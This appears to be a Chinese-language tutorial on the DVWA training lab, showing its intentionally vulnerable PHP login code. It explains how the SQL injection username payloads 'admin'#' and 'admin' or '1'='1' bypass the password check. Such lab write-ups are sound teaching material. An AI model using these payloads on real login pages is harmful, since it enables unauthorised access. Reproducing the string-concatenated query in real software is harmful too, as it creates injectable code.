在上一篇文章的測試中,我用BurpSuite抓包來破解DVWA環境中的Brute Force Attack攻擊,暴力破解了DVWA的登錄用戶名和密碼,這篇文章,我再來看看,除了BurpSuit,是否還能用其它方法來嘗試登錄DVWA,也就是Brute Force Attack的方法二。
1、首先,我們來到DVWA的Brute Force Attack登錄頁面中,點擊右下角的“View Source”,查看該網頁的源代碼,如下:
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Get username
$user = $_GET[ 'username' ];
// Get password
$pass = $_GET[ 'password' ];
$pass = md5( $pass );
// Check the database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
echo "<pre><br />Username and/or password incorrect.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
2、在上述源代碼中,我們可以看到,其中的用戶名密碼輸入驗證處存在SQL注入漏洞,未對user和password兩個字段進行適當的過濾:
$query = "SELECT * FROM `users` WHERE user = '$user' AND password =
'$pass';";
所以,基於此,我們可以在user處構造兩種類型的用戶字段來繞過服務器後端對密碼的驗證機制,如下:
admin’#
admin’ or ‘1’='1
3、最終,在後端數據庫中的運行語句會是這樣的:
$query = "SELECT * FROM `users` WHERE user = 'admin'#' AND password = '$pass';";
以及:
$query = "SELECT * FROM `users` WHERE user = 'admin' or '1'='1' AND password ='$pass';";
這樣,在 # 的註釋和 or 的機制下,登錄機制就不需要對密碼的驗證,最終用admin’# 和 admin’ or ‘1’='1作爲用戶,即能登錄DVWA的Brute Force Attack認證頁面。